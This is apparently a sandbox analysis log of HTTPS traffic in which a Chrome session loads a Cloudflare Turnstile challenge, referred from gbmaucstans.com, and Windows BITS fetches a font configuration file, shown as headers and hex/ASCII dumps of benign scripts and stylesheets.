                                                      2024-04-16 11:56:30 UTC1369INData Raw: 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 62 2c 22 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76 32 2f 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 69 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 73 69 7a 65 29 2e 63 6f 6e 63 61 74 28 64 29 7d 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 29 7b 76 61 72 20 74 3b 72 2e 75 70 67 72 61 64 65 41 74 74 65 6d 70 74 73 2b 2b 3b 76 61 72 20 69 3d 72 74 28 29 3b 69 66 28 21 28 21 69 7c 7c 21 69 2e 70 61 72 65 6e 74 4e 6f 64 65 29 29 7b 76 61 72 20 75 3d 69 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 69 2e 6e 6f 6e 63
                                                      Data Ascii: gi/challenge-platform/").concat(b,"turnstile/if/ov2/av0/rcv").concat(i,"/").concat(e,"/").concat(r,"/").concat(t.theme,"/").concat(t.size).concat(d)}function Vt(e,r){var t;r.upgradeAttempts++;var i=rt();if(!(!i||!i.parentNode)){var u=i==null?void 0:i.nonc
                                                      2024-04-16 11:56:30 UTC1369INData Raw: 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 4e 6f 64 65 49 74 65 72 61 74 6f 72 28 65 2c 4e 6f 64 65 46 69 6c 74 65 72 2e 53 48 4f 57 5f 45 4c 45 4d 45 4e 54 7c 4e 6f 64 65 46 69 6c 74 65 72 2e 53 48 4f 57 5f 54 45 58 54 2c 7b 61 63 63 65 70 74 4e 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 52 29 7b 72 65 74 75 72 6e 20 75 3e 72 7c 7c 69 2e 6c 65 6e 67 74 68 3e 74 3f 4e 6f 64 65 46 69 6c 74 65 72 2e 46 49 4c 54 45 52 5f 52 45 4a 45 43 54 3a 4e 6f 64 65 46 69 6c 74 65 72 2e 46 49 4c 54 45 52 5f 41 43 43 45 50 54 7d 7d 29 2c 6d 3b 28 6d 3d 73 2e 6e 65 78 74 4e 6f 64 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 69 2e 6c 65 6e 67 74 68 3c 74 3b 29 7b 69 66 28 6d 2e 6e 6f 64 65 54 79 70 65 3d 3d 3d 4e 6f 64 65 2e 45 4c 45 4d 45 4e 54 5f 4e 4f 44 45 29 7b 76 61 72 20
                                                      Data Ascii: =document.createNodeIterator(e,NodeFilter.SHOW_ELEMENT|NodeFilter.SHOW_TEXT,{acceptNode:function(R){return u>r||i.length>t?NodeFilter.FILTER_REJECT:NodeFilter.FILTER_ACCEPT}}),m;(m=s.nextNode())!==null&&i.length<t;){if(m.nodeType===Node.ELEMENT_NODE){var


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.549720104.17.3.1844435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:31 UTC787OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/jgoie/0x4AAAAAAAQ_ajLYJ-oSKSIN/auto/normal HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-Dest: iframe
                                                      Referer: http://gbmaucstans.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:31 UTC1343INHTTP/1.1 200 OK
                                                      Date: Tue, 16 Apr 2024 11:56:31 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                      critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                      cross-origin-embedder-policy: require-corp
                                                      cross-origin-opener-policy: same-origin
                                                      cross-origin-resource-policy: cross-origin
                                                      document-policy: js-profiling
                                                      origin-agent-cluster: ?1
                                                      permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                      2024-04-16 11:56:31 UTC112INData Raw: 72 65 66 65 72 72 65 72 2d 70 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 37 35 33 66 65 31 39 64 61 66 39 62 30 65 35 2d 41 54 4c 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                      Data Ascii: referrer-policy: same-originServer: cloudflareCF-RAY: 8753fe19daf9b0e5-ATLalt-svc: h3=":443"; ma=86400
                                                      2024-04-16 11:56:31 UTC1283INData Raw: 37 61 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c
                                                      Data Ascii: 7a00<!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scal
                                                      2024-04-16 11:56:31 UTC1369INData Raw: 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69
                                                      Data Ascii: ng: 0; width: 100%; height: 100%; overflow: hidden;}body { margin: 0; background-color: #fff; padding: 0; width: 100%; height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, bli
                                                      2024-04-16 11:56:31 UTC1369INData Raw: 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 7d 0a 0a 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 38 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b
                                                      Data Ascii: f8f8f8; stroke-miterlimit: 10;}#success-icon { display: flex; margin-right: 8px; border-radius: 50%; box-shadow: inset 0 0 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both;
                                                      2024-04-16 11:56:31 UTC1369INData Raw: 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f
                                                      Data Ascii: hallenge-overlay a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus { color: #949494;}.theme-dark .ctp-checkbox-label .mark { border: 2px solid #dadada; backgro
                                                      2024-04-16 11:56:31 UTC1369INData Raw: 61 3a 61 63 74 69 76 65 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 65 72 6d 73 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65
                                                      Data Ascii: a:active, .theme-dark #terms a:focus { color: #949494;}.theme-dark #content { border-color: #666; background-color: #222;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme
                                                      2024-04-16 11:56:31 UTC1369INData Raw: 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 76 69 73 69 74 65 64 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 2c 20 23 63 68 61 6c
                                                      Data Ascii: ay a,#challenge-error-text a { color: #1d1f20;}#challenge-overlay a:visited, #challenge-overlay a:link,#challenge-error-text a:visited,#challenge-error-text a:link { color: #1d1f20;}#challenge-overlay a:active, #challenge-overlay a:hover, #chal
                                                      2024-04-16 11:56:31 UTC1369INData Raw: 73 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 73 70 61 6e 2e 63 74 70 2d 6c 61 62 65 6c 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d
                                                      Data Ascii: s ~ .mark { border: 2px solid #c44d0e;}.ctp-checkbox-label input:focus ~ span.ctp-label { text-decoration: underline;}.ctp-checkbox-label input:checked ~ .mark { transform: rotate(0deg) scale(1); opacity: 1; border-radius: 5px; background-
                                                      2024-04-16 11:56:31 UTC1369INData Raw: 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 32 70 78 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 31 36 70
                                                      Data Ascii: margin-bottom: 0; height: 22px;}.size-compact .cb-container { margin-top: 3px; margin-left: 0;}.size-compact #branding { display: flex; flex-flow: row-reverse wrap; place-content: center flex-start; align-items: center; margin: 5px 16p
                                                      2024-04-16 11:56:31 UTC1369INData Raw: 3b 0a 20 20 77 69 64 74 68 3a 20 39 30 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 66 2d 73 74 61 67 65 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63
                                                      Data Ascii: ; width: 90px; text-align: center;}.rtl .size-compact #branding { padding-right: 0; padding-left: 0; text-align: center;}.rtl .size-compact #terms { text-align: center;}.rtl .size-compact #cf-stage { padding-right: 48px;}.rtl .size-c


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.54972123.63.206.91443
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:31 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      Accept-Encoding: identity
                                                      User-Agent: Microsoft BITS/7.8
                                                      Host: fs.microsoft.com
                                                      2024-04-16 11:56:31 UTC468INHTTP/1.1 200 OK
                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                      Content-Type: application/octet-stream
                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                      Server: ECAcc (chd/079C)
                                                      X-CID: 11
                                                      X-Ms-ApiVersion: Distribute 1.2
                                                      X-Ms-Region: prod-eus2-z1
                                                      Cache-Control: public, max-age=155227
                                                      Date: Tue, 16 Apr 2024 11:56:31 GMT
                                                      Connection: close
                                                      X-CID: 2


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.549722104.17.3.1844435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:32 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/jgoie/0x4AAAAAAAQ_ajLYJ-oSKSIN/auto/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:32 UTC248INHTTP/1.1 200 OK
                                                      Date: Tue, 16 Apr 2024 11:56:32 GMT
                                                      Content-Type: image/png
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: max-age=2629800, public
                                                      Server: cloudflare
                                                      CF-RAY: 8753fe1ddc064588-ATL
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-16 11:56:32 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                      Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                      2024-04-16 11:56:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.54972323.63.206.91443
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:32 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      Accept-Encoding: identity
                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                      Range: bytes=0-2147483646
                                                      User-Agent: Microsoft BITS/7.8
                                                      Host: fs.microsoft.com
                                                      2024-04-16 11:56:32 UTC531INHTTP/1.1 200 OK
                                                      Content-Type: application/octet-stream
                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                      ApiVersion: Distribute 1.1
                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                      X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                      Cache-Control: public, max-age=155236
                                                      Date: Tue, 16 Apr 2024 11:56:32 GMT
                                                      Content-Length: 55
                                                      Connection: close
                                                      X-CID: 2
                                                      2024-04-16 11:56:32 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.549724104.17.3.1844435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:32 UTC710OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8753fe19daf9b0e5 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/jgoie/0x4AAAAAAAQ_ajLYJ-oSKSIN/auto/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:32 UTC335INHTTP/1.1 200 OK
                                                      Date: Tue, 16 Apr 2024 11:56:32 GMT
                                                      Content-Type: application/javascript; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Server: cloudflare
                                                      CF-RAY: 8753fe209d9f451d-ATL
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-16 11:56:32 UTC1034INData Raw: 37 65 36 30 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 76 2c 66 45 2c 66 46 2c 66 4a 2c 66 4c 2c 66 4d 2c 66 4e 2c 66 4f 2c 66 50 2c 66 51 2c 66 52 2c 66 53 2c 66 54 2c 66 55 2c 66 56 2c 66 57 2c 66 58 2c 66 59 2c 66 5a 2c 67 30 2c 67 31 2c 67 32 2c 67 33 2c 67 34 2c 67 35 2c 67 36 2c 67 37 2c 67 38 2c 67 39 2c 67 61 2c 67 62 2c 67 63 2c 67 64 2c 67 65 2c 67 66 2c 67 67 2c 67 68 2c 67 69 2c 67 6a 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 48 2c 67 54 2c 68 36 2c 68 62 2c 68 63 2c 68 64 2c 68 70 2c 68 79 2c 68 43 2c
                                                      Data Ascii: 7e60window._cf_chl_opt.uaO=false;~function(iv,fE,fF,fJ,fL,fM,fN,fO,fP,fQ,fR,fS,fT,fU,fV,fW,fX,fY,fZ,g0,g1,g2,g3,g4,g5,g6,g7,g8,g9,ga,gb,gc,gd,ge,gf,gg,gh,gi,gj,gk,gl,gm,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gH,gT,h6,hb,hc,hd,hp,hy,hC,
